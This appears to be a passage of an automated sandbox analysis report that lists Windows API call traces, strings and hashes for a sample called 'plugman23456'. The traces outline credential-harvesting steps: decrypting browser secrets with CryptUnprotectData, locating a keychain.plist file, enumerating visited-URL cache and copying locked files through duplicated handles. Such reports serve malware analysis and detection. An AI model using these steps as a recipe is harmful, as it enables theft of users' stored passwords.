                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                          • memset.MSVCRT ref: 00413E07
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                          • CloseHandle.KERNELBASE(?), ref: 00413EA8
                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Handle$??3@CloseProcessProcess32memset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                          • API String ID: 3405910027-1740548384
                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                          • memcpy.MSVCRT ref: 0040B60D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                          • String ID: BIN
                          • API String ID: 1668488027-1015027815
                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                          APIs
                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                          • String ID:
                          • API String ID: 2947809556-0
                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 767404330-0
                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                          APIs
                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID:
                          • API String ID: 1690352074-0
                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                          APIs
                          • memset.MSVCRT ref: 0041898C
                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: InfoSystemmemset
                          • String ID:
                          • API String ID: 3558857096-0
                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 004455C2
                          • wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 0044570D
                          • memset.MSVCRT ref: 00445725
                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                          • memset.MSVCRT ref: 0044573D
                          • memset.MSVCRT ref: 00445755
                          • memset.MSVCRT ref: 004458CB
                          • memset.MSVCRT ref: 004458E3
                          • memset.MSVCRT ref: 0044596E
                          • memset.MSVCRT ref: 00445A10
                          • memset.MSVCRT ref: 00445A28
                          • memset.MSVCRT ref: 00445AC6
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                          • memset.MSVCRT ref: 00445B52
                          • memset.MSVCRT ref: 00445B6A
                          • memset.MSVCRT ref: 00445C9B
                          • memset.MSVCRT ref: 00445CB3
                          • _wcsicmp.MSVCRT ref: 00445D56
                          • memset.MSVCRT ref: 00445B82
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                          • memset.MSVCRT ref: 00445986
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                          • API String ID: 1274392031-3798722523
                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                          • String ID: $/deleteregkey$/savelangfile
                          • API String ID: 2744995895-28296030
                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                          • wcsrchr.MSVCRT ref: 0040B738
                          • memset.MSVCRT ref: 0040B756
                          • memset.MSVCRT ref: 0040B7F5
                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                          • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                          • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                          • memset.MSVCRT ref: 0040B851
                          • memset.MSVCRT ref: 0040B8CA
                          • memcmp.MSVCRT ref: 0040B9BF
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                          • memset.MSVCRT ref: 0040BB53
                          • memcpy.MSVCRT ref: 0040BB66
                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                          • String ID: chp$v10
                          • API String ID: 1297422669-2783969131
                          • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                          • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                          • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                          • CloseHandle.KERNEL32(?), ref: 0040E148
                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                          • String ID: bhv
                          • API String ID: 4234240956-2689659898
                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2941347001-70141382
                          • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                          • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID:
                          • API String ID: 2791496988-0
                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040C298
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                          • wcschr.MSVCRT ref: 0040C324
                          • wcschr.MSVCRT ref: 0040C344
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                          • GetLastError.KERNEL32 ref: 0040C373
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                          • String ID: visited:
                          • API String ID: 2470578098-1702587658
                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                          • memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                          • _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                          • API String ID: 3883404497-2982631422
                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                          • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040BC75
                          • memset.MSVCRT ref: 0040BC8C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                          • memcmp.MSVCRT ref: 0040BCD6
                          • memcpy.MSVCRT ref: 0040BD2B
                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                          • String ID:
                          • API String ID: 115830560-3916222277
                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                          • GetLastError.KERNEL32 ref: 0041847E
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile$??3@ErrorLast
                          • String ID: |A
                          • API String ID: 1407640353-1717621600
                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                          Control-flow Graph

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                          • wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                          • wcslen.MSVCRT ref: 0040D1D3
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                          • memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
